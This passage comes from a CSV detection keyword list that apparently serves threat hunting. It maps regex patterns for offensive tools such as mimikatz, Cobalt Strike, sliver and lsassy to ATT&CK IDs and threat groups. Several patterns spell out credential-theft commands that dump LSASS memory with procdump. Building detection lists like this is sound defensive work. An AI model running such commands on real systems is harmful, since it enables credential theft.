Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55461" "*PrivKit32*",".{0,1000}PrivKit32.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations 
on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55462" "*PrivKit-main*",".{0,1000}PrivKit\-main.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55463" "*Probable-Wordlists*",".{0,1000}Probable\-Wordlists.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","55465" "*Probable-Wordlists*",".{0,1000}Probable\-Wordlists.{0,1000}","offensive_tool_keyword","Probable-Wordlists","real password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","55466" "*procdump* lsass.exe *.dmp*",".{0,1000}procdump.{0,1000}\slsass\.exe\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","55467" "*procdump.exe -accepteula -ma lsass.exe*",".{0,1000}procdump\.exe\s\-accepteula\s\-ma\slsass\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - 
TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","55470" "*procdump.exe*lsass*",".{0,1000}procdump\.exe.{0,1000}lsass.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1003.001","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55472" "*procdump/dump_windows.go*",".{0,1000}procdump\/dump_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55473" "*procdump_dump*",".{0,1000}procdump_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","55474" "*procdump_embedded*",".{0,1000}procdump_embedded.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","55475" "*procdump_path=*",".{0,1000}procdump_path\=.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","55476" "*procdump64.exe -ma lsass.exe*",".{0,1000}procdump64\.exe\s\-ma\slsass\.exe.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","55478" "*ProcDumpHandler.py -r *",".{0,1000}ProcDumpHandler\.py\s\-r\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","55480" "*Process injected MessageBox*",".{0,1000}Process\sinjected\sMessageBox.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","55483" "*Process is not 64-bit, this version of katz won't work yo'!*",".{0,1000}Process\sis\snot\s64\-bit,\sthis\sversion\sof\skatz\swon\'t\swork\syo\'!.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - 
T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55484" "*Process is not 64-bit, this version of katz won't work yo'!*",".{0,1000}Process\sis\snot\s64\-bit,\sthis\sversion\sof\skatz\swon\'t\swork\syo\'!.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55485" "*process must run as NT AUTHORITY\\SYSTEM to dump lsass memory*",".{0,1000}process\smust\srun\sas\sNT\sAUTHORITY\\\\SYSTEM\sto\sdump\slsass\smemory.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","55486" "*process::exports*",".{0,1000}process\:\:exports.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55487" "*process::suspend*",".{0,1000}process\:\:suspend.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55488" "*process_herpaderping*",".{0,1000}process_herpaderping.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55489" "*process_imports.cna*",".{0,1000}process_imports\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","N/A","10","10","85","11","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z","55490" "*process_imports.x64*",".{0,1000}process_imports\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","N/A","10","10","85","11","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z","55491" "*process_imports_api *.exe*",".{0,1000}process_imports_api\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","0","N/A","N/A","10","10","85","11","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z","55492" 
"*process_inject_allocator*",".{0,1000}process_inject_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55493" "*process_inject_bof_allocator*",".{0,1000}process_inject_bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55494" "*process_inject_bof_reuse_memory*",".{0,1000}process_inject_bof_reuse_memory.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55495" "*process_inject_execute*",".{0,1000}process_inject_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55496" "*process_inject_min_alloc*",".{0,1000}process_inject_min_alloc.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth 
Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55497" "*process_inject_startrwx*",".{0,1000}process_inject_startrwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 
